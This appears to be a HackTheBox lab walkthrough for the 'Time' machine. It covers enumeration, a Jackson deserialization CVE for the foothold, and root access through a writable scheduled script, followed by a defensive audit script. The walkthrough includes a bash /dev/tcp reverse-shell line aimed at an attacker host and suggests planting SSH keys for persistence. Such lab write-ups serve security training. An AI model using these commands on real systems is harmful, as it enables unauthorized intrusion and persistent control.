# Time Walkthrough

Hey everyone! Today we have one of the **HackTheBox** machines, “**Time**”, which is rated medium. Let’s take a look at its info.

<figure><img src="https://cdn-images-1.medium.com/max/800/1*m5Qs2Uck4nJg2DKV3yDqeA.png" alt=""><figcaption></figcaption></figure>

It runs Linux and relies on CVEs for the foothold exploit. Let’s get started…

**What we will do?**

As usual, we follow a set of steps to **pwn** any machine:

1. [**Recon / Information gathering**](#information-gathering)
2. [**Scanning**](#scanning)
3. [**Gaining Access**](#gaining-access)
4. [**Maintaining Access**](#maintaining-access)
5. **Reporting / Analysis**

After finishing these steps we will have this information, so stay calm and keep reading :)

<figure><img src="https://cdn-images-1.medium.com/max/800/1*lMu5gPEwuPf9QA6yIwrLUg.jpeg" alt=""><figcaption></figcaption></figure>

## **Information Gathering**

In this step, we aim to collect all the information we can about a specific target, such as its open ports, the security mode of its login systems, directories, OS version, service versions, etc.

**Nmap**

We will start this step by scanning the ports to discover which ones are open and find out where we can get into this machine.

`nmap -A -T4 10.10.10.214`

<figure><img src="https://cdn-images-1.medium.com/max/800/1*7ACohqbDOkQH0hWgoRSWLg.png" alt=""><figcaption></figcaption></figure>

It has only 2 open ports, `ssh/http`, and the services running on them are not vulnerable, “I know that”.

So let’s check the website

**HTTP Enumeration**

After accessing port `80`, we found this:

<figure><img src="https://cdn-images-1.medium.com/max/800/1*xMYfOxf4uYWfrCUQsMBdGw.png" alt=""><figcaption></figcaption></figure>

It’s an online JSON beautifier and validator.

After checking the source code, I found nothing.

The next step is to check the directories, so I used `dirsearch` for this task, and it returned these results:

`python3 dirsearch.py -u 10.10.10.214`

<figure><img src="https://cdn-images-1.medium.com/max/800/1*4BIU1oBKP7tv2D6Qh5Somg.png" alt=""><figcaption></figcaption></figure>

I didn’t see any interesting directories, so to double-check I used `gobuster` with a different wordlist:

`gobuster dir -u 10.10.10.214 -w /path/to/wordlist -l`

<figure><img src="https://cdn-images-1.medium.com/max/800/1*SLUYSTEFtfvbWZFIlyx3OQ.png" alt=""><figcaption></figcaption></figure>

The same results, so let’s return to the website and try every function there.

## **Scanning**

In this step, we aim to examine all the information collected in the previous one.

After trying to validate some text using `validate(Beta)`, I found this error:

<figure><img src="https://cdn-images-1.medium.com/max/800/1*iopMGUp5rJpQrMohqwLv-A.png" alt=""><figcaption></figcaption></figure>

<figure><img src="https://cdn-images-1.medium.com/max/800/1*f9jE00Hwyw2FGN8VwwgiiA.png" alt=""><figcaption><p>The error</p></figcaption></figure>

The validation process depends on `fasterxml.jackson`. Actually, I didn’t know what this is! But after searching for it, I learned that it’s something related to Java and used for text validation. After searching for any exploit for these words, I found this CVE:

<figure><img src="https://cdn-images-1.medium.com/max/800/1*8UtH0IzQPpcNIiej7W7XNA.png" alt=""><figcaption></figcaption></figure>

## **Gaining Access**

It works locally, as you will see in the repo, but after understanding its methodology you can edit the execution method to make it remote. To be honest, I also asked my friend about it :)

Here’s the code before and after editing it:

<figure><img src="https://cdn-images-1.medium.com/max/800/1*tafWCiSAOuIz_JnU9cEWtA.png" alt=""><figcaption></figcaption></figure>

The first command is the original one, which you will find in the repo, and the second is the edited command that works remotely.

Note that it will get a file called `inject.sql` from the attacker machine and then use it to exploit the vulnerability, so I downloaded it and edited the command that will be executed on the server to return a reverse shell: `bash -i >& /dev/tcp/attacker-ip/port 0>&1`

<figure><img src="https://cdn-images-1.medium.com/max/800/1*e6ks648TnTDzWkDv4jWF7g.png" alt=""><figcaption></figcaption></figure>

The next step is to execute this command in the text validator area and use `nc` to listen on the port which you typed in the payload.

<figure><img src="https://cdn-images-1.medium.com/max/800/1*foTwyxM5AD2dsaYG6RJFtg.png" alt=""><figcaption><p>Request inject.sql file from the attacker machine</p></figcaption></figure>

<figure><img src="https://cdn-images-1.medium.com/max/800/1*nyuGx-MaLG0PN0BAqzQQkw.png" alt=""><figcaption></figcaption></figure>

It works, and we have a shell now.

<figure><img src="https://cdn-images-1.medium.com/max/800/1*4XyVvKBdEbONN02Og8TIuw.png" alt=""><figcaption></figcaption></figure>

## **Maintaining Access**

For this step, I’ve performed multiple tasks to get the root privileges:

1. Enumerate the directories and files for any leaked data
2. Use Exploit-Suggester tools to discover the kernel vulnerabilities
3. Use automation tools to perform multiple tasks like `linPEAS` or `linenum`
4. Use `PsPy` to watch the executed processes and note whether any process can lead me to the root flag

After enumerating the system directories and files, I didn’t find anything, so let’s go to the next step…

I’ve transferred all the required tools to the vulnerable machine

<figure><img src="https://cdn-images-1.medium.com/max/800/1*9ZQnVA74EuTUvjMoNv9G8w.png" alt=""><figcaption></figcaption></figure>

After executing the suggester script, it didn’t discover anything.

<figure><img src="https://cdn-images-1.medium.com/max/800/1*TB2z--AX-E3wx1mg1VxjUQ.png" alt=""><figcaption></figcaption></figure>

Let’s use `PsPy`

<figure><img src="https://cdn-images-1.medium.com/max/800/1*CW3R2HbNuqtPEZSvP2GTjg.png" alt=""><figcaption></figcaption></figure>

I noticed that there’s a process that is executed every few seconds, as you can see, so I accessed the file `/usr/bin/timer_backup.sh`

<figure><img src="https://cdn-images-1.medium.com/max/800/1*cHKTHYUWZK-MRXCDuBFGRg.png" alt=""><figcaption></figcaption></figure>

I found that I have permission to edit it, so I inserted a command into it which gets the root flag into a `/home` directory

<figure><img src="https://cdn-images-1.medium.com/max/800/1*rjt58cysuKKmDghvT6-aEQ.png" alt=""><figcaption></figcaption></figure>

And as you can see, it works ❤

Also, you can insert your SSH keys into the root directory and open a root shell using SSH.
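A defender-side check for the weakness used above (a script that root runs on a schedule but a low-privileged user can edit), as an added example that is not part of the original write-up. It assumes the recurring job is defined in systemd unit files, which the page does not state; `TRUSTED_UID` and the function names are illustrative.

```shell
#!/bin/sh
# Added example (not from the original write-up): flag programs started by
# root-run systemd units that someone other than the trusted owner can modify.
# Assumption: the recurring job is defined in a unit file with ExecStart= lines.

TRUSTED_UID="${TRUSTED_UID:-0}"   # root; overridable for unprivileged testing

# Print every absolute path that appears on an ExecStart= line, so that
# "ExecStart=/bin/bash /usr/bin/timer_backup.sh" yields the script as well.
exec_targets() {
    awk '/^ExecStart=/ {
        sub(/^ExecStart=[-@+!:]*/, "")
        n = split($0, tok, /[ \t]+/)
        for (i = 1; i <= n; i++) if (tok[i] ~ /^\//) print tok[i]
    }' "$@"
}

# True when the path is not owned by the trusted UID or is group/world writable.
# -L checks what a symlink points to; a missing path yields no output (false).
is_tamperable() {
    [ -n "$(find -L "$1" -prune \( ! -user "$TRUSTED_UID" -o -perm -020 -o -perm -002 \) 2>/dev/null)" ]
}

# Check the file and its directory: write access to either lets a user change
# what root executes. Parent directories further up are not walked here.
audit_target() {
    for p in "$1" "$(dirname "$1")"; do
        if is_tamperable "$p"; then
            echo "TAMPERABLE $1 (via $p)"
            return 1
        fi
    done
}

# Audit all targets of the given unit files; non-zero if any finding.
audit_units() {
    rc=0
    for t in $(exec_targets "$@"); do
        audit_target "$t" || rc=1
    done
    return "$rc"
}

# Usage: sh audit.sh /etc/systemd/system/*.service
if [ "$#" -gt 0 ]; then audit_units "$@"; fi
```

Any `TAMPERABLE` line means the file should be owned by root with mode `755` or stricter, and its directory should not be writable by other users.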

**Congrats ❤**

## Stay in touch <a href="#id-7363" id="id-7363"></a>

[LinkedIn](https://www.linkedin.com/in/eslam-akl-6b998614a/) | [GitHub](https://github.com/eslam3kl) | [Twitter](https://twitter.com/eslam3kll)


